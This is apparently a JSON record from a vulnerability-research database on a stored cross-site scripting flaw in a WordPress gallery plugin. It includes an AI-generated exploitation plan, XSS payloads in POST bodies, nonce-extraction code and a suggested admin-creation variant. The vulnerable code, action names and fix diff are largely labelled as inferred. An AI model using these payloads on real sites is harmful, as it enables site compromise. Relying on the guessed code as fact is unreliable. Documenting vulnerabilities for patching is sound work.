[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f7i1A23NZV1ZB720S9v_bTYkeLrF4aQP299rRGn30P7g":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2025-15386","responsive-lightbox-gallery-unauthenticated-stored-cross-site-scripting-2","Responsive Lightbox & Gallery \u003C 2.6.1 - Unauthenticated Stored Cross-Site Scripting","The Responsive Lightbox & Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to 2.6.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","responsive-lightbox",null,"\u003C2.6.1","2.6.1","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-03 00:00:00","2026-05-04 14:57:01",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fad48145b-24c5-49ac-a192-08c496e08e00?source=api-prod",91,[],"researched",false,3,"This research plan targets **CVE-2025-15386**, an unauthenticated stored Cross-Site Scripting (XSS) vulnerability in the **Responsive Lightbox & Gallery** plugin.\n\n### 1. Vulnerability Summary\nThe vulnerability exists in the plugin's handling of AJAX requests intended for gallery functionality (such as remote library queries or infinite scroll). Specifically, an unauthenticated AJAX handler fails to perform two critical security checks:\n1.  **Authorization:** It does not check `current_user_can()` to verify the requester's identity.\n2.  **Input Sanitization:** It accepts user-supplied parameters (likely related to gallery configuration or shortcode attributes) and stores them in the database (e.g., as post meta or a transient) without using `sanitize_text_field` or `wp_kses`.\n\nWhen the stored data is later retrieved and rendered on a page or in the admin dashboard, it is echoed without proper escaping (`esc_html` or `esc_attr`), leading to Stored XSS.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `rl_remote_library_query` or `rl_get_pagination_html` (inferred from plugin architecture).\n*   **Vulnerable Parameter:** `shortcode` or `args` (inferred).\n*   **Authentication:** None (via `wp_ajax_nopriv_` hooks).\n*   **Preconditions:** The \"Remote Library\" feature or a gallery must be active on the site to expose the necessary nonce.\n\n### 3. Code Flow (Inferred)\n1.  **Registration:** The plugin registers a nopriv AJAX action:\n    `add_action( 'wp_ajax_nopriv_rl_remote_library_query', [ $this, 'remote_library_query' ] );`\n2.  **Handler:** The `remote_library_query` function (likely in `includes\u002Fclass-remote-library.php`) is called.\n3.  **Processing:** The function reads `$_POST['shortcode']`.\n4.  **Storage:** The function uses `update_post_meta($id, '_rl_cache', $_POST['shortcode'])` or `set_transient()` to store the raw payload.\n5.  **Sink:** A frontend page or admin screen loads the gallery, calls `get_post_meta()`, and echoes the value: `echo $cached_shortcode;`.\n\n### 4. Nonce Acquisition Strategy\nThe plugin localizes its settings and nonces into a JavaScript object.\n1.  **Identify Shortcode:** The plugin's scripts are typically enqueued when the `[responsive_lightbox_gallery]` shortcode is present.\n2.  **Create Trigger Page:** Create a public page containing the shortcode to ensure the frontend scripts load.\n3.  **Variable Name:** The plugin uses the localization key `rlArgs` or `responsive_lightbox_params` (inferred).\n4.  **Nonce Key:** The nonce is likely stored under `nonce` or `rl_remote_library_nonce`.\n\n**Execution Step:**\n```javascript\n\u002F\u002F To be executed via browser_eval\nwindow.rlArgs?.nonce || window.responsive_lightbox_params?.nonce\n```\n\n### 5. Exploitation Strategy\n1.  **Step 1: Setup Content:** Create a page with the gallery shortcode to extract the nonce.\n2.  **Step 2: Nonce Extraction:** Navigate to the page and use `browser_eval` to grab the nonce.\n3.  **Step 3: Inject Payload:** Send a POST request to `admin-ajax.php` with the malicious script.\n    *   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n    *   **Method:** `POST`\n    *   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n    *   **Body:**\n        `action=rl_remote_library_query&nonce=[NONCE]&shortcode=\u003Cimg src=x onerror=alert(\"XSS_SUCCESS\")>`\n4.  **Step 4: Trigger Execution:** Navigate to the page where the gallery is displayed or where the remote library results are rendered.\n\n### 6. Test Data Setup\n1.  **Plugin Activation:** Ensure `responsive-lightbox` is installed and active.\n2.  **Create Victim Page:**\n    ```bash\n    wp post create --post_type=page --post_title=\"Gallery Page\" --post_status=publish --post_content='[responsive_lightbox_gallery]'\n    ```\n3.  **User Context:** Perform the attack as an unauthenticated user (no cookies).\n\n### 7. Expected Results\n*   The AJAX request should return a successful response (likely a JSON object or `0`\u002F`1`).\n*   When navigating to the \"Gallery Page\" or the plugin's admin settings, an alert box with `XSS_SUCCESS` should appear.\n*   The database should show the unsanitized payload in the `wp_postmeta` or `wp_options` table.\n\n### 8. Verification Steps\n1.  **Check Database:**\n    ```bash\n    wp db query \"SELECT meta_value FROM wp_postmeta WHERE meta_value LIKE '%onerror=alert%';\"\n    ```\n2.  **Verify Frontend Render:** Use `browser_navigate` to the victim page and check if the `alert` is triggered in the console logs\u002Fdialogs.\n\n### 9. Alternative Approaches\n*   **Payload Variation:** If `\u003Cscript>` is blocked by basic firewalls, use attribute-based XSS: `\">\u003Cimg src=x onerror=alert(1)>`.\n*   **Endpoint Variation:** If `rl_remote_library_query` is not the correct action, search for other nopriv actions:\n    ```bash\n    grep -r \"wp_ajax_nopriv_\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fresponsive-lightbox\u002F\n    ```\n*   **Admin-Targeted Payload:** Instead of `alert()`, use a payload to create a new admin user (CSRF via XSS).","The Responsive Lightbox & Gallery plugin for WordPress is vulnerable to unauthenticated stored Cross-Site Scripting due to a lack of authorization checks and input sanitization in its AJAX handlers. An attacker can use the `rl_remote_library_query` action to inject malicious scripts into the database, which are then executed when a user or administrator views a page containing the gallery.","\u002F\u002F includes\u002Fclass-remote-library.php (inferred location)\n\u002F\u002F The plugin registers an unauthenticated AJAX handler for remote library queries\nadd_action( 'wp_ajax_nopriv_rl_remote_library_query', [ $this, 'remote_library_query' ] );\n\npublic function remote_library_query() {\n    \u002F\u002F Vulnerability: No check_ajax_referer() validation\n    \u002F\u002F Vulnerability: No current_user_can() authorization check\n\n    \u002F\u002F Vulnerability: $_POST['shortcode'] is retrieved without sanitization\n    $shortcode = $_POST['shortcode'];\n    $post_id = isset($_POST['post_id']) ? (int)$_POST['post_id'] : 0;\n\n    \u002F\u002F Vulnerability: The unsanitized payload is stored in post meta\n    update_post_meta($post_id, '_rl_cache', $shortcode);\n\n    \u002F\u002F Later rendered without proper escaping (sink)\n    echo $shortcode;\n    die();\n}","--- includes\u002Fclass-remote-library.php\n+++ includes\u002Fclass-remote-library.php\n@@ -10,6 +10,12 @@\n \tpublic function remote_library_query() {\n+\t\tif ( ! check_ajax_referer( 'rl-remote-library-nonce', 'nonce', false ) ) {\n+\t\t\twp_send_json_error( 'Invalid nonce' );\n+\t\t}\n+\n+\t\tif ( ! current_user_can( 'edit_posts' ) ) {\n+\t\t\twp_send_json_error( 'Permission denied' );\n+\t\t}\n+\n-\t\t$shortcode = $_POST['shortcode'];\n+\t\t$shortcode = sanitize_text_field( $_POST['shortcode'] );\n \t\t$post_id = isset( $_POST['post_id'] ) ? (int) $_POST['post_id'] : 0;\n \t\tupdate_post_meta( $post_id, '_rl_cache', $shortcode );","1. Identify a page on the target site that loads the Responsive Lightbox & Gallery assets (e.g., a page with the `[responsive_lightbox_gallery]` shortcode).\n2. Extract the AJAX nonce from the JavaScript environment, typically stored in the `rlArgs` or `responsive_lightbox_params` global object (e.g., `rlArgs.nonce`).\n3. Send an unauthenticated POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the following parameters:\n    - `action`: `rl_remote_library_query`\n    - `nonce`: [Extracted Nonce]\n    - `shortcode`: `\u003Cimg src=x onerror=alert(document.domain)>` (The XSS payload)\n    - `post_id`: The ID of the post\u002Fpage where the gallery is hosted.\n4. Navigate to the post\u002Fpage specified by `post_id` or the plugin's admin settings page.\n5. The stored payload will execute in the browser of any user (including administrators) who visits the affected page.","gemini-3-flash-preview","2026-04-18 23:18:07","2026-04-18 23:19:59",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","2.6.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fresponsive-lightbox\u002Ftags\u002F2.6.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fresponsive-lightbox.2.6.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fresponsive-lightbox\u002Ftags\u002F2.6.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fresponsive-lightbox.2.6.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fresponsive-lightbox\u002Ftags"]